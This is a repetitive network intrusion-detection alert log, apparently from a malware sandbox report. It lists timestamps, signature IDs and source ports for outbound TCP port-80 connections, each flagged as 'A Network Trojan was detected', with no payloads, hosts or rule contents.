                          Timestamp:04/06/24-09:31:15.463121
                          SID:2021641
                          Source Port:49862
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:26.328739
                          SID:2025381
                          Source Port:49720
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:14.423119
                          SID:2024313
                          Source Port:49785
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:41.891260
                          SID:2825766
                          Source Port:49745
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:15.972978
                          SID:2025381
                          Source Port:49787
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:56.595283
                          SID:2024318
                          Source Port:49762
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:14.423119
                          SID:2024318
                          Source Port:49785
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:57.360186
                          SID:2825766
                          Source Port:49763
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:56.595283
                          SID:2024313
                          Source Port:49762
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:52.865138
                          SID:2021641
                          Source Port:49834
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:13.897343
                          SID:2025381
                          Source Port:49860
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:03.603579
                          SID:2025381
                          Source Port:49771
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:51.314444
                          SID:2025381
                          Source Port:49832
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:27.906071
                          SID:2021641
                          Source Port:49722
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:24.137227
                          SID:2825766
                          Source Port:49717
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:44.269499
                          SID:2024313
                          Source Port:49823
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:45.801533
                          SID:2025381
                          Source Port:49825
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:52.706701
                          SID:2024313
                          Source Port:49757
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:08.547895
                          SID:2021641
                          Source Port:49852
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:54.259588
                          SID:2025381
                          Source Port:49759
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:03.891737
                          SID:2024318
                          Source Port:49846
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:05.441892
                          SID:2025381
                          Source Port:49848
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:31.133120
                          SID:2825766
                          Source Port:49806
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:35.705322
                          SID:2024313
                          Source Port:49734
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:24.839758
                          SID:2025381
                          Source Port:49718
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:30.339047
                          SID:2024318
                          Source Port:49805
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:45.042075
                          SID:2825766
                          Source Port:49824
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:20.136720
                          SID:2025381
                          Source Port:49866
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:41.891260
                          SID:2021641
                          Source Port:49745
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:18.590588
                          SID:2024313
                          Source Port:49864
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:35.705322
                          SID:2024318
                          Source Port:49734
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:34.975531
                          SID:2021641
                          Source Port:49811
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:18.590588
                          SID:2024318
                          Source Port:49864
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:52.706701
                          SID:2024318
                          Source Port:49757
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:09.757970
                          SID:2025381
                          Source Port:49777
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:44.269499
                          SID:2024318
                          Source Port:49823
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:03.891737
                          SID:2024313
                          Source Port:49846
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:57.360186
                          SID:2021641
                          Source Port:49763
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:30.339047
                          SID:2024313
                          Source Port:49805
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:04.359604
                          SID:2024318
                          Source Port:49772
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:15.205072
                          SID:2825766
                          Source Port:49786
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:17.895022
                          SID:2825766
                          Source Port:49789
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:55.812911
                          SID:2025381
                          Source Port:49761
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:06.739588
                          SID:2024318
                          Source Port:49775
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:06.739588
                          SID:2024313
                          Source Port:49775
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:31.907019
                          SID:2025381
                          Source Port:49807
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:14.663983
                          SID:2024318
                          Source Port:49861
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:06.999341
                          SID:2025381
                          Source Port:49850
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:42.736556
                          SID:2021641
                          Source Port:49821
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:41.115114
                          SID:2024313
                          Source Port:49744
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:42.690473
                          SID:2025381
                          Source Port:49746
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:52.096160
                          SID:2024318
                          Source Port:49833
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:43.454363
                          SID:2024313
                          Source Port:49747
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:53.641650
                          SID:2025381
                          Source Port:49835
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:54.422589
                          SID:2024313
                          Source Port:49836
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:45.042075
                          SID:2021641
                          Source Port:49824
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:41.115114
                          SID:2024318
                          Source Port:49744
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:43.454363
                          SID:2024318
                          Source Port:49747
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:33.437852
                          SID:2021641
                          Source Port:49809
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:45.018070
                          SID:2025381
                          Source Port:49749
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:54.422589
                          SID:2024318
                          Source Port:49836
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:55.998033
                          SID:2025381
                          Source Port:49838
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:52.096160
                          SID:2024313
                          Source Port:49833
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:17.112021
                          SID:2024318
                          Source Port:49788
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:05.891670
                          SID:2025381
                          Source Port:49774
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:32.673178
                          SID:2024313
                          Source Port:49808
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:05.124910
                          SID:2825766
                          Source Port:49773
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:15.463121
                          SID:2825766
                          Source Port:49862
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:25.556361
                          SID:2024313
                          Source Port:49719
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:17.112021
                          SID:2024313
                          Source Port:49788
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:42.736556
                          SID:2825766
                          Source Port:49821
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:41.966393
                          SID:2024313
                          Source Port:49820
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:06.206380
                          SID:2024318
                          Source Port:49849
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:17.895022
                          SID:2021641
                          Source Port:49789
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:25.556361
                          SID:2024318
                          Source Port:49719
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:41.966393
                          SID:2024318
                          Source Port:49820
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:55.035047
                          SID:2021641
                          Source Port:49760
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:43.503603
                          SID:2025381
                          Source Port:49822
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:06.206380
                          SID:2024313
                          Source Port:49849
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:17.815577
                          SID:2025381
                          Source Port:49863
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:32.673178
                          SID:2024318
                          Source Port:49808
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:34.860100
                          SID:2024318
                          Source Port:49731
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:34.860100
                          SID:2024313
                          Source Port:49731
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:04.359604
                          SID:2024313
                          Source Port:49772
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:33.437852
                          SID:2825766
                          Source Port:49809
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:44.242163
                          SID:2021641
                          Source Port:49748
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:55.220105
                          SID:2021641
                          Source Port:49837
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:14.663983
                          SID:2024313
                          Source Port:49861
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:45.018070
                          SID:2021641
                          Source Port:49749
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:25.641172
                          SID:2025381
                          Source Port:49799
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:46.581121
                          SID:2825766
                          Source Port:49751
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:51.123133
                          SID:2024313
                          Source Port:49755
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:04.659572
                          SID:2021641
                          Source Port:49847
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:51.123133
                          SID:2024318
                          Source Port:49755
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:06.999341
                          SID:2021641
                          Source Port:49850
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:09.316933
                          SID:2024313
                          Source Port:49853
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:47.378472
                          SID:2021641
                          Source Port:49752
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:54.422589
                          SID:2025381
                          Source Port:49836
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:09.316933
                          SID:2024318
                          Source Port:49853
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:11.314149
                          SID:2021641
                          Source Port:49780
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:28.779878
                          SID:2025381
                          Source Port:49803
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:13.652600
                          SID:2825766
                          Source Port:49784
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:38.799315
                          SID:2025381
                          Source Port:49741
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:14.423119
                          SID:2021641
                          Source Port:49785
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:03.891737
                          SID:2825766
                          Source Port:49846
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:19.440133
                          SID:2024313
                          Source Port:49791
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:44.242163
                          SID:2825766
                          Source Port:49748
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:24.825007
                          SID:2025381
                          Source Port:49872
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:31.298967
                          SID:2024313
                          Source Port:49727
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:43.503603
                          SID:2021641
                          Source Port:49822
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:31.298967
                          SID:2024318
                          Source Port:49727
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:59.690030
                          SID:2025381
                          Source Port:49766
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:21.735500
                          SID:2025381
                          Source Port:49794
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:32.673178
                          SID:2025381
                          Source Port:49808
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:12.357168
                          SID:2024313
                          Source Port:49858
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:52.706701
                          SID:2021641
                          Source Port:49757
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:27.906071
                          SID:2024318
                          Source Port:49722
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:28.699735
                          SID:2825766
                          Source Port:49723
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:50.516269
                          SID:2025381
                          Source Port:49831
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:57.360186
                          SID:2024318
                          Source Port:49763
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:12.357168
                          SID:2024318
                          Source Port:49858
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:27.906071
                          SID:2024313
                          Source Port:49722
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:38.861510
                          SID:2825766
                          Source Port:49818
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:57.360186
                          SID:2024313
                          Source Port:49763
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:08.980641
                          SID:2825766
                          Source Port:49776
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:23.194950
                          SID:2021641
                          Source Port:49870
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:04.359604
                          SID:2021641
                          Source Port:49772
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:26.424765
                          SID:2024318
                          Source Port:49800
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:10.846749
                          SID:2025381
                          Source Port:49856
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:33.437852
                          SID:2024318
                          Source Port:49809
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:31.133120
                          SID:2021641
                          Source Port:49806
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:02.046578
                          SID:2021641
                          Source Port:49769
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:26.424765
                          SID:2024313
                          Source Port:49800
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:55.998033
                          SID:2825766
                          Source Port:49838
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:27.109787
                          SID:2025381
                          Source Port:49721
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:59.991734
                          SID:2825766
                          Source Port:49841
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:01.279270
                          SID:2825766
                          Source Port:49768
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:03.119856
                          SID:2024313
                          Source Port:49845
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:20.136720
                          SID:2825766
                          Source Port:49866
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:33.437852
                          SID:2024313
                          Source Port:49809
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:53.470085
                          SID:2025381
                          Source Port:49758
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:00.769505
                          SID:2021641
                          Source Port:49842
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:47.361321
                          SID:2021641
                          Source Port:49827
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:03.119856
                          SID:2024318
                          Source Port:49845
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:41.115114
                          SID:2021641
                          Source Port:49744
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:34.860100
                          SID:2825766
                          Source Port:49731
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:30.339047
                          SID:2825766
                          Source Port:49805
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:15.205072
                          SID:2025381
                          Source Port:49786
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:23.301208
                          SID:2825766
                          Source Port:49796
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:03.603579
                          SID:2024313
                          Source Port:49771
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:44.269499
                          SID:2025381
                          Source Port:49823
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:18.590588
                          SID:2025381
                          Source Port:49864
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:48.181654
                          SID:2025381
                          Source Port:49828
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:10.080334
                          SID:2021641
                          Source Port:49855
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:09.757970
                          SID:2021641
                          Source Port:49777
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:39.686953
                          SID:2021641
                          Source Port:49819
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:55.220105
                          SID:2024318
                          Source Port:49837
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:22.429106
                          SID:2025381
                          Source Port:49869
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:36.516498
                          SID:2021641
                          Source Port:49814
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:55.220105
                          SID:2024313
                          Source Port:49837
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:52.096160
                          SID:2825766
                          Source Port:49833
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:38.036927
                          SID:2021641
                          Source Port:49740
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:59.991734
                          SID:2024313
                          Source Port:49841
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:45.042075
                          SID:2025381
                          Source Port:49824
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:59.991734
                          SID:2024318
                          Source Port:49841
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:12.357168
                          SID:2825766
                          Source Port:49858
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:36.488685
                          SID:2021641
                          Source Port:49737
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:02.046578
                          SID:2825766
                          Source Port:49769
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:12.096911
                          SID:2025381
                          Source Port:49781
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:26.424765
                          SID:2825766
                          Source Port:49800
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:48.957388
                          SID:2024318
                          Source Port:49829
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:55.998033
                          SID:2024313
                          Source Port:49838
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:20.907030
                          SID:2825766
                          Source Port:49867
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:46.592042
                          SID:2021641
                          Source Port:49826
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:48.178974
                          SID:2025381
                          Source Port:49753
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:53.641650
                          SID:2021641
                          Source Port:49835
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:55.998033
                          SID:2024318
                          Source Port:49838
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:00.493399
                          SID:2024318
                          Source Port:49767
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:02.814837
                          SID:2024313
                          Source Port:49770
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:27.203747
                          SID:2021641
                          Source Port:49801
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:23.194950
                          SID:2825766
                          Source Port:49870
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:48.957388
                          SID:2024313
                          Source Port:49829
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:03.603579
                          SID:2024318
                          Source Port:49771
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:14.663983
                          SID:2825766
                          Source Port:49861
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:34.204192
                          SID:2021641
                          Source Port:49810
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
